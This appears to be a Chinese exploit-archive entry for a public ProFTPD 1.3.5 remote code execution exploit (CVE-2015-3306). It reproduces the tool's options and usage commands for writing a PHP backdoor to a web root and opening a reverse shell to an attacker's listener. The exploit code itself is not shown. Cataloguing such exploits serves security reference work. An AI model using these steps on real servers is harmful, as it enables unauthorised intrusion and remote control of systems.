关联漏洞
介绍
# (m4ud) ProFTPD 1.3.5 RCE exploit CVE : 2015-3306!
ProFTPd 1.3.5 RCE
Usage: ProFTPD.py [options]
Options:
-h, --help show this help message and exit
-l LHOST, --lhost=LHOST
Local IP Required for Reverse Shell,
-p LPORT, --lport=LPORT
Port Required for Reverse Shell,
-t TARGET, --target=TARGET
Vulnerable Target,
-d DIRECTORY, --dir=DIRECTORY
WebRoot directory to Upload Backdoor, Default: /var/www/html
-c COMMAND, --command=COMMAND
System Command,
-f FILE, --file=FILE
Backdoor Name, Default: shell.php.
STEP 1 - Write Backdoor to target machine!
Usage: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'
STEP 2 - Get Shell!!
Usage: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242
文件快照
[4.0K] /data/pocs/f3ec975336c98f9d89675dfbf08123b09b4e8b44
├── [ 34K] LICENSE
├── [4.4K] ProFTPD_1.3.5_rce.py
└── [1020] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。